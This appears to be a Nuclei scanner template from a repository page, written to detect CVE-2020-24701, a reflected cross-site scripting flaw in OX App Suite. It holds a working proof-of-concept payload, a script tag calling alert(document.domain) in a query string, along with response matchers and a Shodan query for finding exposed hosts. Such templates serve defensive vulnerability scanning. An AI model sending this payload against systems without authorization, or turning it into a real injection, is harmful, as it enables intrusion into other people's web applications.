52 lines
1.6 KiB
YAML
52 lines
1.6 KiB
YAML
id: CVE-2020-24701
|
|
|
|
info:
|
|
name: OX Appsuite - Cross-Site Scripting
|
|
author: DhiyaneshDk
|
|
severity: medium
|
|
description: |
|
|
OX App Suite through 7.10.4 allows XSS via the app loading mechanism (the PATH_INFO to the /appsuite URI).
|
|
reference:
|
|
- https://packetstormsecurity.com/files/163527/OX-App-Suite-OX-Guard-OX-Documents-SSRF-Cross-Site-Scripting.html
|
|
- https://seclists.org/fulldisclosure/2021/Jul/33
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24701
|
|
- https://www.open-xchange.com
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-24701
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00818
|
|
epss-percentile: 0.79891
|
|
cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: open-xchange
|
|
product: open-xchange_appsuite
|
|
shodan-query: html:"Appsuite"
|
|
tags: packetstorm,seclists,cve,cve2020,appsuite,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/ajax/apps/manifests?action=all&format=debug&xss=<script>alert(document.domain);</script>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'Request with action all'
|
|
- '<script>alert(document.domain);</script>'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022075f00b221be380c8a458552efac85e988a46045b85346b87d9949ce3c54fee1e0221008d21a30c07ca13bd1ecc6055762ee7506dd6f0c8e177c4ea647fe12242e1b18e:922c64590222798bb761d5b6d8e72950 |